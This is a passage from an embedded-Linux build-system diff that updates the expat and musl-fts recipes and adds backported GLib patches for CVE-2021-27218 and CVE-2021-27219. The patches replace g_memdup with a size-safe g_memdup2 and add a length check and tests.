2DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)" 2DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)"
3HOMEPAGE = "http://expat.sourceforge.net/" 3HOMEPAGE = "https://github.com/libexpat/libexpat"
4SECTION = "libs" 4SECTION = "libs"
5LICENSE = "MIT" 5LICENSE = "MIT"
6 6
7LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79" 7LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79"
8 8
9SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \ 9SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
10 file://CVE-2013-0340.patch \
11 file://CVE-2021-45960.patch \
12 file://CVE-2021-46143.patch \
13 file://CVE-2022-22822-27.patch \
14 file://CVE-2022-23852.patch \
15 file://CVE-2022-23990.patch \
16 file://CVE-2022-25235.patch \
17 file://CVE-2022-25236.patch \
18 file://CVE-2022-25313.patch \
19 file://CVE-2022-25313-regression.patch \
20 file://CVE-2022-25314.patch \
21 file://CVE-2022-25315.patch \
10 file://libtool-tag.patch \ 22 file://libtool-tag.patch \
11 " 23 file://CVE-2022-40674.patch \
24 file://CVE-2022-43680.patch \
25 "
12 26
13SRC_URI[md5sum] = "875a2c2ff3e8eb9e5a5cd62db2033ab5" 27SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"
14SRC_URI[sha256sum] = "f1063084dc4302a427dabcca499c8312b3a32a29b7d2506653ecc8f950a9a237"
15 28
16inherit autotools lib_package 29inherit autotools lib_package
17 30
18do_configure_prepend () { 31S = "${WORKDIR}/git/expat"
19 rm -f ${S}/conftools/libtool.m4
20}
21 32
22BBCLASSEXTEND = "native nativesdk" 33BBCLASSEXTEND = "native nativesdk"
34
35CVE_PRODUCT = "expat libexpat"
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index 589ae0e916..d3b0f31eda 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -3,13 +3,14 @@
3 3
4SUMMARY = "Implementation of ftsfor musl libc packages" 4SUMMARY = "Implementation of ftsfor musl libc packages"
5HOMEPAGE = "https://github.com/pullmoll/musl-fts" 5HOMEPAGE = "https://github.com/pullmoll/musl-fts"
6DESCRIPTION = "The musl-fts package implements the fts(3) functions fts_open, fts_read, fts_children, fts_set and fts_close, which are missing in musl libc."
6LICENSE = "BSD-3-Clause" 7LICENSE = "BSD-3-Clause"
7LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982" 8LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982"
8SECTION = "libs" 9SECTION = "libs"
9 10
10SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472" 11SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
11 12
12SRC_URI = "git://github.com/pullmoll/musl-fts.git" 13SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
13 14
14S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
15 16
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
new file mode 100644
index 0000000000..6257763d8d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
@@ -0,0 +1,129 @@
1Backport of:
2
3From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001
4From: Krzesimir Nowak <qdlacz@gmail.com>
5Date: Wed, 10 Feb 2021 23:51:07 +0100
6Subject: [PATCH] gbytearray: Do not accept too large byte arrays
7
8GByteArray uses guint for storing the length of the byte array, but it
9also has a constructor (g_byte_array_new_take) that takes length as a
10gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits
11for guint). It is possible to call the function with a value greater
12than G_MAXUINT, which will result in silent length truncation. This
13may happen as a result of unreffing GBytes into GByteArray, so rather
14be loud about it.
15
16(Test case tweaked by Philip Withnall.)
17
18(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for
19`g_memdup2()`.)
20
21Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
22CVE: CVE-2021-27218
23Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
24Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
25
26---
27 glib/garray.c | 6 ++++++
28 glib/gbytes.c | 4 ++++
29 glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++-
30 3 files changed, 44 insertions(+), 1 deletion(-)
31
32--- a/glib/garray.c
33+++ b/glib/garray.c
34@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array,
35 * Create byte array containing the data. The data will be owned by the array
36 * and will be freed with g_free(), i.e. it could be allocated using g_strdup().
37 *
38+ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray
39+ * stores the length of its data in #guint, which may be shorter than
40+ * #gsize.
41+ *
42 * Since: 2.32
43 *
44 * Returns: (transfer full): a new #GByteArray
45@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data,
46 GByteArray *array;
47 GRealArray *real;
48
49+ g_return_val_if_fail (len <= G_MAXUINT, NULL);
50+
51 array = g_byte_array_new ();
52 real = (GRealArray *)array;
53 g_assert (real->data == NULL);
54--- a/glib/gbytes.c
55+++ b/glib/gbytes.c
56@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes,
57 * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all
58 * other cases the data is copied.
59 *
60+ * Do not use it if @bytes contains more than %G_MAXUINT
61+ * bytes. #GByteArray stores the length of its data in #guint, which
62+ * may be shorter than #gsize, that @bytes is using.
63+ *
64 * Returns: (transfer full): a new mutable #GByteArray containing the same byte data
65 *
66 * Since: 2.32
67--- a/glib/tests/bytes.c
68+++ b/glib/tests/bytes.c
69@@ -10,12 +10,12 @@
70 */
71
72 #undef G_DISABLE_ASSERT
73-#undef G_LOG_DOMAIN
74
75 #include <stdio.h>
76 #include <stdlib.h>
77 #include <string.h>
78 #include "glib.h"
79+#include "glib/gstrfuncsprivate.h"
80
81 /* Keep in sync with glib/gbytes.c */
82 struct _GBytes
83@@ -334,6 +334,38 @@ test_to_array_transferred (void)
84 }
85
86 static void
87+test_to_array_transferred_oversize (void)
88+{
89+ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to "
90+ "G_MAXUINT in length; test that longer ones are rejected");
91+
92+ if (sizeof (guint) >= sizeof (gsize))
93+ {
94+ g_test_skip ("Skipping test as guint is not smaller than gsize");
95+ }
96+ else if (g_test_undefined ())
97+ {
98+ GByteArray *array = NULL;
99+ GBytes *bytes = NULL;
100+ gpointer data = g_memdup2 (NYAN, N_NYAN);
101+ gsize len = ((gsize) G_MAXUINT) + 1;
102+
103+ bytes = g_bytes_new_take (data, len);
104+ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL,
105+ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed");
106+ array = g_bytes_unref_to_array (g_steal_pointer (&bytes));
107+ g_test_assert_expected_messages ();
108+ g_assert_null (array);
109+
110+ g_free (data);
111+ }
112+ else
113+ {
114+ g_test_skip ("Skipping test as testing undefined behaviour is disabled");
115+ }
116+}
117+
118+static void
119 test_to_array_two_refs (void)
120 {
121 gconstpointer memory;
122@@ -410,6 +442,7 @@ main (int argc, char *argv[])
123 g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred);
124 g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs);
125 g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc);
126+ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize);
127 g_test_add_func ("/bytes/null", test_null);
128
129 return g_test_run ();
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
new file mode 100644
index 0000000000..2af9dd6aa4
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
@@ -0,0 +1,170 @@
1Backport of:
2
3From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Thu, 4 Feb 2021 13:30:52 +0000
6Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function
7MIME-Version: 1.0
8Content-Type: text/plain; charset=UTF-8
9Content-Transfer-Encoding: 8bit
10
11This will replace the existing `g_memdup()` function for use within
12GLib. It has an unavoidable security flaw of taking its `byte_size`
13argument as a `guint` rather than as a `gsize`. Most callers will
14expect it to be a `gsize`, and may pass in large values which could
15silently be truncated, resulting in an undersize allocation compared
16to what the caller expects.
17
18This could lead to a classic buffer overflow vulnerability for many
19callers of `g_memdup()`.
20
21`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`.
22
23Spotted by Kevin Backhouse of GHSL.
24
25In GLib 2.68, `g_memdup2()` will be a new public API. In this version
26for backport to older stable releases, it’s a new `static inline` API
27in a private header, so that use of `g_memdup()` within GLib can be
28fixed without adding a new API in a stable release series.
29
30Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
31Helps: GHSL-2021-045
32Helps: #2319
33
34Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
35CVE: CVE-2021-27219
36Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
37Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
38
39---
40 docs/reference/glib/meson.build | 1 +
41 glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++
42 glib/meson.build | 1 +
43 glib/tests/strfuncs.c | 23 ++++++++++++++
44 4 files changed, 80 insertions(+)
45 create mode 100644 glib/gstrfuncsprivate.h
46
47--- a/docs/reference/glib/meson.build
48+++ b/docs/reference/glib/meson.build
49@@ -22,6 +22,7 @@ if get_option('gtk_doc')
50 'gprintfint.h',
51 'gmirroringtable.h',
52 'gscripttable.h',
53+ 'gstrfuncsprivate.h',
54 'glib-mirroring-tab',
55 'gnulib',
56 'pcre',
57--- /dev/null
58+++ b/glib/gstrfuncsprivate.h
59@@ -0,0 +1,55 @@
60+/* GLIB - Library of useful routines for C programming
61+ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
62+ *
63+ * This library is free software; you can redistribute it and/or
64+ * modify it under the terms of the GNU Lesser General Public
65+ * License as published by the Free Software Foundation; either
66+ * version 2.1 of the License, or (at your option) any later version.
67+ *
68+ * This library is distributed in the hope that it will be useful,
69+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
70+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
71+ * Lesser General Public License for more details.
72+ *
73+ * You should have received a copy of the GNU Lesser General Public
74+ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
75+ */
76+
77+#include <glib.h>
78+#include <string.h>
79+
80+/*
81+ * g_memdup2:
82+ * @mem: (nullable): the memory to copy.
83+ * @byte_size: the number of bytes to copy.
84+ *
85+ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it
86+ * from @mem. If @mem is %NULL it returns %NULL.
87+ *
88+ * This replaces g_memdup(), which was prone to integer overflows when
89+ * converting the argument from a #gsize to a #guint.
90+ *
91+ * This static inline version is a backport of the new public API from
92+ * GLib 2.68, kept internal to GLib for backport to older stable releases.
93+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319.
94+ *
95+ * Returns: (nullable): a pointer to the newly-allocated copy of the memory,
96+ * or %NULL if @mem is %NULL.
97+ * Since: 2.68
98+ */
99+static inline gpointer
100+g_memdup2 (gconstpointer mem,
101+ gsize byte_size)
102+{
103+ gpointer new_mem;
104+
105+ if (mem && byte_size != 0)
106+ {
107+ new_mem = g_malloc (byte_size);
108+ memcpy (new_mem, mem, byte_size);
109+ }
110+ else
111+ new_mem = NULL;
112+
113+ return new_mem;
114+}
115--- a/glib/meson.build
116+++ b/glib/meson.build
117@@ -268,6 +268,7 @@ glib_sources = files(
118 'gslist.c',
119 'gstdio.c',
120 'gstrfuncs.c',
121+ 'gstrfuncsprivate.h',
122 'gstring.c',
123 'gstringchunk.c',
124 'gtestutils.c',
125--- a/glib/tests/strfuncs.c
126+++ b/glib/tests/strfuncs.c
127@@ -32,6 +32,8 @@
128 #include <string.h>
129 #include "glib.h"
130
131+#include "gstrfuncsprivate.h"
132+
133 #if defined (_MSC_VER) && (_MSC_VER <= 1800)
134 #define isnan(x) _isnan(x)
135
136@@ -219,6 +221,26 @@ test_memdup (void)
137 g_free (str_dup);
138 }
139
140+/* Testing g_memdup2() function with various positive and negative cases */
141+static void
142+test_memdup2 (void)
143+{
144+ gchar *str_dup = NULL;
145+ const gchar *str = "The quick brown fox jumps over the lazy dog";
146+
147+ /* Testing negative cases */
148+ g_assert_null (g_memdup2 (NULL, 1024));
149+ g_assert_null (g_memdup2 (str, 0));
150+ g_assert_null (g_memdup2 (NULL, 0));
151+
152+ /* Testing normal usage cases */
153+ str_dup = g_memdup2 (str, strlen (str) + 1);
154+ g_assert_nonnull (str_dup);
155+ g_assert_cmpstr (str, ==, str_dup);
156+
157+ g_free (str_dup);
158+}
159+
160 /* Testing g_strpcpy() function with various positive and negative cases */
161 static void
162 test_stpcpy (void)
163@@ -2523,6 +2545,7 @@ main (int argc,
164 g_test_add_func ("/strfuncs/has-prefix", test_has_prefix);
165 g_test_add_func ("/strfuncs/has-suffix", test_has_suffix);
166 g_test_add_func ("/strfuncs/memdup", test_memdup);
167+ g_test_add_func ("/strfuncs/memdup2", test_memdup2);
168 g_test_add_func ("/strfuncs/stpcpy", test_stpcpy);
169 g_test_add_func ("/strfuncs/str_match_string", test_str_match_string);
170 g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
new file mode 100644
index 0000000000..20137ea5f3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
@@ -0,0 +1,249 @@
1From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:37:56 +0000
4Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious
5 places
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Convert all the call sites which use `g_memdup()`’s length argument
11trivially (for example, by passing a `sizeof()`), so that they use
12`g_memdup2()` instead.
13
14In almost all of these cases the use of `g_memdup()` would not have
15caused problems, but it will soon be deprecated, so best port away from
16it.
17
18Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
19Helps: #2319
20
21Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
22CVE: CVE-2021-27219
23Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
24Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
25
26---
27 gio/gdbusconnection.c | 5 +++--
28 gio/gdbusinterfaceskeleton.c | 3 ++-
29 gio/gfile.c | 7 ++++---
30 gio/gsettingsschema.c | 5 +++--
31 gio/gwin32registrykey.c | 8 +++++---
32 gio/tests/async-close-output-stream.c | 6 ++++--
33 gio/tests/gdbus-export.c | 5 +++--
34 gio/win32/gwinhttpfile.c | 9 +++++----
35 8 files changed, 29 insertions(+), 19 deletions(-)
36
37--- a/gio/gdbusconnection.c
38+++ b/gio/gdbusconnection.c
39@@ -110,6 +110,7 @@
40 #include "gasyncinitable.h"
41 #include "giostream.h"
42 #include "gasyncresult.h"
43+#include "gstrfuncsprivate.h"
44 #include "gtask.h"
45 #include "gmarshal-internal.h"
46
47@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB
48 /* Don't waste memory by copying padding - remember to update this
49 * when changing struct _GDBusInterfaceVTable in gdbusconnection.h
50 */
51- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
52+ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
53 }
54
55 static void
56@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus
57 /* Don't waste memory by copying padding - remember to update this
58 * when changing struct _GDBusSubtreeVTable in gdbusconnection.h
59 */
60- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
61+ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
62 }
63
64 static void
65--- a/gio/gdbusinterfaceskeleton.c
66+++ b/gio/gdbusinterfaceskeleton.c
67@@ -28,6 +28,7 @@
68 #include "gdbusmethodinvocation.h"
69 #include "gdbusconnection.h"
70 #include "gmarshal-internal.h"
71+#include "gstrfuncsprivate.h"
72 #include "gtask.h"
73 #include "gioerror.h"
74
75@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke
76 * properly before building the hooked_vtable, so we create it
77 * once at the last minute.
78 */
79- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
80+ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
81 interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call;
82 }
83
84--- a/gio/gfile.c
85+++ b/gio/gfile.c
86@@ -60,6 +60,7 @@
87 #include "gasyncresult.h"
88 #include "gioerror.h"
89 #include "glibintl.h"
90+#include "gstrfuncsprivate.h"
91
92
93 /**
94@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re
95 g_main_context_invoke_full (g_task_get_context (task),
96 g_task_get_priority (task),
97 measure_disk_usage_invoke_progress,
98- g_memdup (&progress, sizeof progress),
99+ g_memdup2 (&progress, sizeof progress),
100 g_free);
101 }
102
103@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask
104 data->progress_callback ? measure_disk_usage_progress : NULL, task,
105 &result.disk_usage, &result.num_dirs, &result.num_files,
106 &error))
107- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free);
108+ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free);
109 else
110 g_task_return_error (task, error);
111 }
112@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF
113
114 task = g_task_new (file, cancellable, callback, user_data);
115 g_task_set_source_tag (task, g_file_real_measure_disk_usage_async);
116- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free);
117+ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free);
118 g_task_set_priority (task, io_priority);
119
120 g_task_run_in_thread (task, measure_disk_usage_thread);
121--- a/gio/gsettingsschema.c
122+++ b/gio/gsettingsschema.c
123@@ -20,6 +20,7 @@
124
125 #include "gsettingsschema-internal.h"
126 #include "gsettings.h"
127+#include "gstrfuncsprivate.h"
128
129 #include "gvdb/gvdb-reader.h"
130 #include "strinfo.c"
131@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin
132
133 if (g_str_has_suffix (key, "/"))
134 {
135- gint length = strlen (key);
136+ gsize length = strlen (key);
137
138- strv[j] = g_memdup (key, length);
139+ strv[j] = g_memdup2 (key, length);
140 strv[j][length - 1] = '\0';
141 j++;
142 }
143--- a/gio/gwin32registrykey.c
144+++ b/gio/gwin32registrykey.c
145@@ -28,6 +28,8 @@
146 #include <ntstatus.h>
147 #include <winternl.h>
148
149+#include "gstrfuncsprivate.h"
150+
151 #ifndef _WDMDDK_
152 typedef enum _KEY_INFORMATION_CLASS {
153 KeyBasicInformation,
154@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const
155 new_iter->value_name_size = iter->value_name_size;
156
157 if (iter->value_data != NULL)
158- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size);
159+ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size);
160
161 new_iter->value_data_size = iter->value_data_size;
162
163@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const
164 new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize;
165
166 if (iter->value_data_expanded_u8 != NULL)
167- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8,
168- iter->value_data_expanded_charsize);
169+ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8,
170+ iter->value_data_expanded_charsize);
171
172 new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize;
173
174--- a/gio/tests/async-close-output-stream.c
175+++ b/gio/tests/async-close-output-stream.c
176@@ -24,6 +24,8 @@
177 #include <stdlib.h>
178 #include <string.h>
179
180+#include "gstrfuncsprivate.h"
181+
182 #define DATA_TO_WRITE "Hello world\n"
183
184 typedef struct
185@@ -147,9 +149,9 @@ prepare_data (SetupData *data,
186
187 data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream));
188
189- g_assert_cmpint (data->expected_size, >, 0);
190+ g_assert_cmpuint (data->expected_size, >, 0);
191
192- data->expected_output = g_memdup (written, (guint)data->expected_size);
193+ data->expected_output = g_memdup2 (written, data->expected_size);
194
195 /* then recreate the streams and prepare them for the asynchronous close */
196 destroy_streams (data);
197--- a/gio/tests/gdbus-export.c
198+++ b/gio/tests/gdbus-export.c
199@@ -23,6 +23,7 @@
200 #include <string.h>
201
202 #include "gdbus-tests.h"
203+#include "gstrfuncsprivate.h"
204
205 /* all tests rely on a shared mainloop */
206 static GMainLoop *loop = NULL;
207@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection
208 g_assert_not_reached ();
209 }
210
211- return g_memdup (interfaces, 2 * sizeof (void *));
212+ return g_memdup2 (interfaces, 2 * sizeof (void *));
213 }
214
215 static const GDBusInterfaceVTable *
216@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect
217 {
218 const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL };
219
220- return g_memdup (interfaces, 2 * sizeof (void *));
221+ return g_memdup2 (interfaces, 2 * sizeof (void *));
222 }
223
224 static const GDBusInterfaceVTable *
225--- a/gio/win32/gwinhttpfile.c
226+++ b/gio/win32/gwinhttpfile.c
227@@ -29,6 +29,7 @@
228 #include "gio/gfile.h"
229 #include "gio/gfileattribute.h"
230 #include "gio/gfileinfo.h"
231+#include "gstrfuncsprivate.h"
232 #include "gwinhttpfile.h"
233 #include "gwinhttpfileinputstream.h"
234 #include "gwinhttpfileoutputstream.h"
235@@ -393,10 +394,10 @@
236 child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
237 child->vfs = winhttp_file->vfs;
238 child->url = winhttp_file->url;
239- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
240- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
241- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
242- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
243+ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
244+ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
245+ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
246+ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
247 child->url.lpszUrlPath = wnew_path;
248 child->url.dwUrlPathLength = wcslen (wnew_path);
249 child->url.lpszExtraInfo = NULL;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
new file mode 100644
index 0000000000..eceff161a6
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
@@ -0,0 +1,131 @@
1From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:39:25 +0000
4Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in
5 obvious places
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Convert all the call sites which use `g_memdup()`’s length argument
11trivially (for example, by passing a `sizeof()`), so that they use
12`g_memdup2()` instead.
13
14In almost all of these cases the use of `g_memdup()` would not have
15caused problems, but it will soon be deprecated, so best port away from
16it.
17
18Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
19Helps: #2319
20
21Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
22CVE: CVE-2021-27219
23Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
24Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
25
26---
27 gobject/gsignal.c | 3 ++-
28 gobject/gtype.c | 9 +++++----
29 gobject/gtypemodule.c | 3 ++-
30 gobject/tests/param.c | 4 +++-
31 4 files changed, 12 insertions(+), 7 deletions(-)
32
33--- a/gobject/gsignal.c
34+++ b/gobject/gsignal.c
35@@ -28,6 +28,7 @@
36 #include <signal.h>
37
38 #include "gsignal.h"
39+#include "gstrfuncsprivate.h"
40 #include "gtype-private.h"
41 #include "gbsearcharray.h"
42 #include "gvaluecollector.h"
43@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal
44 node->single_va_closure_is_valid = FALSE;
45 node->flags = signal_flags & G_SIGNAL_FLAGS_MASK;
46 node->n_params = n_params;
47- node->param_types = g_memdup (param_types, sizeof (GType) * n_params);
48+ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);
49 node->return_type = return_type;
50 node->class_closure_bsa = NULL;
51 if (accumulator)
52--- a/gobject/gtype.c
53+++ b/gobject/gtype.c
54@@ -33,6 +33,7 @@
55
56 #include "glib-private.h"
57 #include "gconstructor.h"
58+#include "gstrfuncsprivate.h"
59
60 #ifdef G_OS_WIN32
61 #include <windows.h>
62@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode
63 iholder->next = iface_node_get_holders_L (iface);
64 iface_node_set_holders_W (iface, iholder);
65 iholder->instance_type = NODE_TYPE (node);
66- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL;
67+ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL;
68 iholder->plugin = plugin;
69
70 /* create an iface entry for this type */
71@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type
72 INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface));
73
74 check_interface_info_I (iface, instance_type, &tmp_info);
75- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info));
76+ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info));
77 }
78
79 return iholder; /* we don't modify write lock upon returning NULL */
80@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode
81 IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface);
82
83 if (pentry)
84- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size);
85+ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size);
86 }
87 if (!vtable)
88- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
89+ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
90 entry->vtable = vtable;
91 vtable->g_type = NODE_TYPE (iface);
92 vtable->g_instance_type = NODE_TYPE (node);
93--- a/gobject/gtypemodule.c
94+++ b/gobject/gtypemodule.c
95@@ -19,6 +19,7 @@
96
97 #include <stdlib.h>
98
99+#include "gstrfuncsprivate.h"
100 #include "gtypeplugin.h"
101 #include "gtypemodule.h"
102
103@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule
104 module_type_info->loaded = TRUE;
105 module_type_info->info = *type_info;
106 if (type_info->value_table)
107- module_type_info->info.value_table = g_memdup (type_info->value_table,
108+ module_type_info->info.value_table = g_memdup2 (type_info->value_table,
109 sizeof (GTypeValueTable));
110
111 return module_type_info->type;
112--- a/gobject/tests/param.c
113+++ b/gobject/tests/param.c
114@@ -2,6 +2,8 @@
115 #include <glib-object.h>
116 #include <stdlib.h>
117
118+#include "gstrfuncsprivate.h"
119+
120 static void
121 test_param_value (void)
122 {
123@@ -874,7 +876,7 @@ main (int argc, char *argv[])
124 test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d",
125 data.change_this_flag, data.change_this_type,
126 data.use_this_flag, data.use_this_type);
